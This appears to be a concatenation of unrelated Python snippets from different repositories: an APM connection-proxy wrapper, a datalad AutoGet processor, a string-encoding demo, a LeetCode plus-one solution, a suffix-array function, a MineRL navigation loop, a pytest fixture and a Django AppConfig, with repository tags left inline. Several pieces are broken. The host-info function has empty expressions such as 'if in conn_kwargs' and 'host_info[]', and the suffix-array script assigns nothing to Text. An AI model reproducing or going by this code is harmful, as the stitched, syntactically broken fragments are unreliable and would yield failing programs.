getattr(self._apm_wrap_conn, key) def __setattr__(self, key, value): if( key in ['_apm_wrap_conn', '_apm_comp_name', '_apm_host_info']): self.__dict__[key] = value else: return setattr(self._apm_wrap_conn, key, value) @staticmethod def get_host_info(method_info, conn_kwargs): host_info = {} if in conn_kwargs: host_info[] = conn_kwargs[] elif constants.default_host in method_info: host_info[] = conn_kwargs[] if constants.port in conn_kwargs: host_info[constants.port] = str(conn_kwargs[constants.port]) elif constants.default_port in method_info: host_info[constants.port] = method_info[constants.default_port] return host_info @staticmethod def instrument_conn(original, module, method_info): def conn_wrapper(*args, **kwargs): conn = original(*args, **kwargs) if conn is not None: comp = method_info.get(constants.component_str, '') host_info = ConnectionProxy.get_host_info(method_info, kwargs) new_conn = ConnectionProxy(conn, comp, host_info) return new_conn return conn return conn_wrapper
from casclik.controllers.reactive_qp import ReactiveQPController from casclik.controllers.reactive_nlp import ReactiveNLPController from casclik.controllers.pseudo_inverse import PseudoInverseController from casclik.controllers.model_predictive import ModelPredictiveController
<filename>datalad_metalad/processor/<gh_stars>1-10 import logging from .base import Processor from ..pipelineelement import ( PipelineResult, ResultState, PipelineElement, ) from ..utils import check_dataset logger = logging.getLogger("datalad.metadata.processor.autoget") class AutoGet(Processor): """ This processor "gets" a file that is annexed and not locally available. It sets a flag in the element that will allow the AutoDrop-processor to automatically drop the file again. """ def __init__(self): super().__init__() def process(self, pipeline_element: PipelineElement) -> PipelineElement: for traverse_result in pipeline_element.get_result("dataset-traversal-record"): if traverse_result.type == "File": path = traverse_result.path if path.is_symlink(): if path.exists() is False: fs_dataset_path = ( traverse_result.fs_base_path / traverse_result.dataset_path ) dataset = check_dataset(str(fs_dataset_path), "auto_get") logger.debug( f"AutoGet: automatically getting {path} " f"in dataset {dataset.path}") dataset.get(str(traverse_result.path), jobs=1) pipeline_element.set_result( "auto_get", [PipelineResult(ResultState.SUCCESS)]) return pipeline_element
"""Below Python Programme demonstrate encode functions in a string""" #Utf-8 Encoding # unicode string string = 'pythön!' # print string print('The string is:', string) # default encoding to utf-8 string_utf = string.encode() # print result print('The encoded version is:', string_utf) # unicode string string = 'pythön!' # print string print('The string is:', string) # ignore error print('The encoded version (with ignore) is:', string.encode("ascii", "ignore")) # replace error print('The encoded version (with replace) is:', string.encode("ascii", "replace"))
<gh_stars>10-100 class Solution: def plusOne(self, digits): """ :type digits: List[int] :rtype: List[int] """ result = digits[:] for i in range(len(result) - 1, -1, -1): if result[i] == 9: result[i] = 0 if i == 0: result.insert(0, 1) else: result[i] += 1 return result return result
<reponame>liusida/thesis-bodies from stable_baselines3 import PPO filename = "exp5/" model = PPO.load(filename) print(model)
from weatherman import weather_butler import pytest import datetime # noqa import sqlite3 # noqa import yaml import json # noqa import os import unittest mock = unittest.mock.Mock() master_copnfig = 'etc/weatherman.yml' with open(master_copnfig) as ycf: config = yaml.load(ycf, Loader=yaml.FullLoader) environment = os.environ.get('ENVIRONMENT') @pytest.fixture(scope="function") def setup_wb(): wb = weather_butler.WeatherButler('db/weatherman_unit') return wb # def test_get_response(): # def test_format_request_city_id_list(): # def test_format_response(): # def test_poll():
Bioinformatics VI/Week II/
<gh_stars>1-10 import sys def SuffixArray(Text): ''' Suffix Array Input: A string Text. Output: SuffixArray(Text). ''' suffixes = [] suffix_array = [] for i in range(len(Text)): suffixes.append(Text[i:]) suffix_array.append(i) suffix_array = [x for _, x in sorted(zip(suffixes, suffix_array), key=lambda pair: pair[0])] return suffix_array if __name__ == "__main__": Text = suffix_array = SuffixArray(Text) print(', '.join(str(x) for x in suffix_array))
<gh_stars>0 import minerl import gym import logging logging.basicConfig(level=logging.DEBUG) env = gym.make('MineRLNavigateDense-v0') print('v') obs = env.reset() done = False net_reward = 0 while not done: action = env.action_space.noop() print(action) action['camera'] = [0, 0.03 * obs["compassAngle"]] action['back'] = 0 action['forward'] = 1 action['jump'] = 1 action['attack'] = 1 obs, reward, done, info = env.step(action) env.render() net_reward += reward print("Total reward: ", net_reward)
<reponame>Floou/python-basics say = 'всем привет!' print(say)
from django.apps import AppConfig class BocConfig(AppConfig): name = 'boc'